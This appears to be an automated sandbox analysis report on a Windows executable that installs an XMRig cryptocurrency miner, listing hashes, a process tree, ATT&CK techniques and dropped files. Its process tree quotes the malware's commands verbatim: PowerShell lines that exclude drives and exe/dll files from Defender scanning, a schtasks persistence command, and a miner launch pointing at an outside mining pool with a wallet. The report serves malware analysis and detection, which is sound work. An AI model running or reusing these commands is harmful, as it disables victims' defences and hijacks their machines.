Analysis

  • max time kernel
    150s
  • max time network
    139s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    15-10-2021 21:02

General

  • Target

    fbf130705ed4de523fd2e38a6c64848af5d6e1ce6a268251e7b6d6e3f8089957.exe

  • Size

    2.1MB

  • MD5

    ea4b4ec80f45958158d072e1831f8ac7

  • SHA1

    6779946a2959078f21509f7b11e19b33435de555

  • SHA256

    fbf130705ed4de523fd2e38a6c64848af5d6e1ce6a268251e7b6d6e3f8089957

  • SHA512

    543441eedfbee6d83d449cac166a44a33946d47c98a7deb4fa25ba3b5e0a6f278ab2ee401e6871a3dd270a04c1e74e74f06c3a792f1d8fe44138c28384b2fa6e

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fbf130705ed4de523fd2e38a6c64848af5d6e1ce6a268251e7b6d6e3f8089957.exe
    "C:\Users\Admin\AppData\Local\Temp\fbf130705ed4de523fd2e38a6c64848af5d6e1ce6a268251e7b6d6e3f8089957.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fbf130705ed4de523fd2e38a6c64848af5d6e1ce6a268251e7b6d6e3f8089957.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:496
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:316
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1740
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:296
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
          4⤵
          • Creates scheduled task(s)
          PID:3620
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Users\Admin\services32.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3008
        • C:\Users\Admin\services32.exe
          C:\Users\Admin\services32.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3192
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\services32.exe"
            5⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3720
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3552
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                7⤵
                  PID:1764
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2864
              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1256
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\conhost.exe" "/sihost64"
                  7⤵
                    PID:4088
                • C:\Windows\System32\svchost.exe
                  C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14433 --user=45ddq5YpuUQCJ8iJ6qHRppHoXQQmNa71sd7etMgq58C38SzLL8AsiDE7t1NyBJ63tKgHhnnjmnGwfQWLK2LM6T5X7afG9bA --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6HHGf1Foqy7mnkIeuzoJkOcgzvOATbBVsAjZZH9DRxlA" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3960

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Command and Control

      Web Service

      1
      T1102

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
        MD5

        84f2160705ac9a032c002f966498ef74

        SHA1

        e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

        SHA256

        7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

        SHA512

        f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        MD5

        ad5cd538ca58cb28ede39c108acb5785

        SHA1

        1ae910026f3dbe90ed025e9e96ead2b5399be877

        SHA256

        c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

        SHA512

        c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        MD5

        a1903ed127a1732736136cd755a98c65

        SHA1

        13ccfd84792f5ae052d982ddde0c4779b1552045

        SHA256

        38822702e6d45bce637b1539e3c7d717f2dc77998003c4a30ba99fa1737c3200

        SHA512

        15ffdd39e36de17ec1be144b0d617720dfde5e4d8d7709e523ba21f7cc8ce1c7b1f4eb0fda26d66cc15327a911bbed9d0e70ba09bcf879729b2bc0c6f7a237b9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        MD5

        f421ac99d123ddb7f758d1982a4cbf36

        SHA1

        695423b9e61b484aedc405168d56a2cf3dfcf1c9

        SHA256

        1265f5cc77d9f69cdff14f0e8305f557724bbff266a576df43efbd9551ae1fbe

        SHA512

        7b8d8a629987fee1bf040bd24e770e46569d0b598ee98f3c5f819282911038a82cf56c991fa6aacd9c77570e5e3c660179d10ce2614028973fbf2dfcab9ba0b1

      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        MD5

        744801599080b17870d2f72a3aa5d2f3

        SHA1

        bec7f01ed3cd50763f475f60fd0041e9f702469d

        SHA256

        15edefd0a5d5b482bb99551a743cb16c5c6cd3683fa9f5f56a2e100dfcdbdb09

        SHA512

        a472487ae1886f33d231860d507fda974334275f48ca3e7b8eb71ee413e3ec4dc32e00d30920f06aca635e3e3ef855716ff93f5b77d8db216765f54fe743d691

      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        MD5

        744801599080b17870d2f72a3aa5d2f3

        SHA1

        bec7f01ed3cd50763f475f60fd0041e9f702469d

        SHA256

        15edefd0a5d5b482bb99551a743cb16c5c6cd3683fa9f5f56a2e100dfcdbdb09

        SHA512

        a472487ae1886f33d231860d507fda974334275f48ca3e7b8eb71ee413e3ec4dc32e00d30920f06aca635e3e3ef855716ff93f5b77d8db216765f54fe743d691

      • C:\Users\Admin\services32.exe
        MD5

        ea4b4ec80f45958158d072e1831f8ac7

        SHA1

        6779946a2959078f21509f7b11e19b33435de555

        SHA256

        fbf130705ed4de523fd2e38a6c64848af5d6e1ce6a268251e7b6d6e3f8089957

        SHA512

        543441eedfbee6d83d449cac166a44a33946d47c98a7deb4fa25ba3b5e0a6f278ab2ee401e6871a3dd270a04c1e74e74f06c3a792f1d8fe44138c28384b2fa6e

      • C:\Users\Admin\services32.exe
        MD5

        ea4b4ec80f45958158d072e1831f8ac7

        SHA1

        6779946a2959078f21509f7b11e19b33435de555

        SHA256

        fbf130705ed4de523fd2e38a6c64848af5d6e1ce6a268251e7b6d6e3f8089957

        SHA512

        543441eedfbee6d83d449cac166a44a33946d47c98a7deb4fa25ba3b5e0a6f278ab2ee401e6871a3dd270a04c1e74e74f06c3a792f1d8fe44138c28384b2fa6e

      • memory/296-140-0x0000000000000000-mapping.dmp
      • memory/316-164-0x0000019157A46000-0x0000019157A48000-memory.dmp
        Filesize

        8KB

      • memory/316-138-0x0000019157A43000-0x0000019157A45000-memory.dmp
        Filesize

        8KB

      • memory/316-126-0x0000019155E70000-0x0000019155E72000-memory.dmp
        Filesize

        8KB

      • memory/316-128-0x0000019155E70000-0x0000019155E72000-memory.dmp
        Filesize

        8KB

      • memory/316-129-0x0000019155E70000-0x0000019155E72000-memory.dmp
        Filesize

        8KB

      • memory/316-130-0x000001916FC00000-0x000001916FC01000-memory.dmp
        Filesize

        4KB

      • memory/316-125-0x0000000000000000-mapping.dmp
      • memory/316-132-0x0000019155E70000-0x0000019155E72000-memory.dmp
        Filesize

        8KB

      • memory/316-127-0x0000019155E70000-0x0000019155E72000-memory.dmp
        Filesize

        8KB

      • memory/316-181-0x0000019157A48000-0x0000019157A49000-memory.dmp
        Filesize

        4KB

      • memory/316-167-0x0000019155E70000-0x0000019155E72000-memory.dmp
        Filesize

        8KB

      • memory/316-134-0x0000019155E70000-0x0000019155E72000-memory.dmp
        Filesize

        8KB

      • memory/316-137-0x0000019157A40000-0x0000019157A42000-memory.dmp
        Filesize

        8KB

      • memory/316-142-0x0000019155E70000-0x0000019155E72000-memory.dmp
        Filesize

        8KB

      • memory/316-139-0x000001916FDB0000-0x000001916FDB1000-memory.dmp
        Filesize

        4KB

      • memory/496-124-0x0000000000000000-mapping.dmp
      • memory/1256-230-0x0000000000000000-mapping.dmp
      • memory/1740-207-0x00000133A96C8000-0x00000133A96C9000-memory.dmp
        Filesize

        4KB

      • memory/1740-182-0x00000133A96C0000-0x00000133A96C2000-memory.dmp
        Filesize

        8KB

      • memory/1740-183-0x00000133A96C3000-0x00000133A96C5000-memory.dmp
        Filesize

        8KB

      • memory/1740-168-0x0000000000000000-mapping.dmp
      • memory/1740-170-0x00000133A7690000-0x00000133A7692000-memory.dmp
        Filesize

        8KB

      • memory/1740-171-0x00000133A7690000-0x00000133A7692000-memory.dmp
        Filesize

        8KB

      • memory/1740-172-0x00000133A7690000-0x00000133A7692000-memory.dmp
        Filesize

        8KB

      • memory/1740-173-0x00000133A7690000-0x00000133A7692000-memory.dmp
        Filesize

        8KB

      • memory/1740-184-0x00000133A96C6000-0x00000133A96C8000-memory.dmp
        Filesize

        8KB

      • memory/1740-176-0x00000133A7690000-0x00000133A7692000-memory.dmp
        Filesize

        8KB

      • memory/1740-177-0x00000133A7690000-0x00000133A7692000-memory.dmp
        Filesize

        8KB

      • memory/1740-179-0x00000133A7690000-0x00000133A7692000-memory.dmp
        Filesize

        8KB

      • memory/1764-225-0x0000000000000000-mapping.dmp
      • memory/2788-135-0x0000023C7B843000-0x0000023C7B845000-memory.dmp
        Filesize

        8KB

      • memory/2788-119-0x0000023C7BA80000-0x0000023C7BC9D000-memory.dmp
        Filesize

        2.1MB

      • memory/2788-136-0x0000023C7B846000-0x0000023C7B847000-memory.dmp
        Filesize

        4KB

      • memory/2788-115-0x0000023C7AE70000-0x0000023C7AE72000-memory.dmp
        Filesize

        8KB

      • memory/2788-133-0x0000023C7B840000-0x0000023C7B842000-memory.dmp
        Filesize

        8KB

      • memory/2788-116-0x0000023C7AE70000-0x0000023C7AE72000-memory.dmp
        Filesize

        8KB

      • memory/2788-117-0x0000023C7AE70000-0x0000023C7AE72000-memory.dmp
        Filesize

        8KB

      • memory/2788-131-0x0000023C79010000-0x0000023C79231000-memory.dmp
        Filesize

        2.1MB

      • memory/2788-123-0x0000023C7AE70000-0x0000023C7AE72000-memory.dmp
        Filesize

        8KB

      • memory/2788-122-0x0000023C7B010000-0x0000023C7B011000-memory.dmp
        Filesize

        4KB

      • memory/2788-118-0x0000023C7AE70000-0x0000023C7AE72000-memory.dmp
        Filesize

        8KB

      • memory/2788-121-0x0000023C7AE70000-0x0000023C7AE72000-memory.dmp
        Filesize

        8KB

      • memory/2864-280-0x000002A576048000-0x000002A576049000-memory.dmp
        Filesize

        4KB

      • memory/2864-271-0x000002A576043000-0x000002A576045000-memory.dmp
        Filesize

        8KB

      • memory/2864-242-0x0000000000000000-mapping.dmp
      • memory/2864-273-0x000002A576046000-0x000002A576048000-memory.dmp
        Filesize

        8KB

      • memory/2864-270-0x000002A576040000-0x000002A576042000-memory.dmp
        Filesize

        8KB

      • memory/3008-208-0x0000000000000000-mapping.dmp
      • memory/3192-211-0x0000000000000000-mapping.dmp
      • memory/3552-224-0x0000000000000000-mapping.dmp
      • memory/3620-141-0x0000000000000000-mapping.dmp
      • memory/3720-239-0x00000138DEB63000-0x00000138DEB65000-memory.dmp
        Filesize

        8KB

      • memory/3720-238-0x00000138DEB60000-0x00000138DEB62000-memory.dmp
        Filesize

        8KB

      • memory/3720-240-0x00000138DEB66000-0x00000138DEB67000-memory.dmp
        Filesize

        4KB

      • memory/3960-241-0x0000000140000000-0x0000000140786000-memory.dmp
        Filesize

        7.5MB

      • memory/3960-235-0x000000014030F3F8-mapping.dmp
      • memory/3960-281-0x00000278D2570000-0x00000278D2590000-memory.dmp
        Filesize

        128KB

      • memory/3960-295-0x00000278D25C0000-0x00000278D25E0000-memory.dmp
        Filesize

        128KB

      • memory/3960-294-0x00000278D25A0000-0x00000278D25C0000-memory.dmp
        Filesize

        128KB

      • memory/4088-282-0x000002203A9B0000-0x000002203A9B6000-memory.dmp
        Filesize

        24KB

      • memory/4088-291-0x0000022054F30000-0x0000022054F32000-memory.dmp
        Filesize

        8KB

      • memory/4088-292-0x0000022054F33000-0x0000022054F35000-memory.dmp
        Filesize

        8KB

      • memory/4088-293-0x0000022054F36000-0x0000022054F37000-memory.dmp
        Filesize

        4KB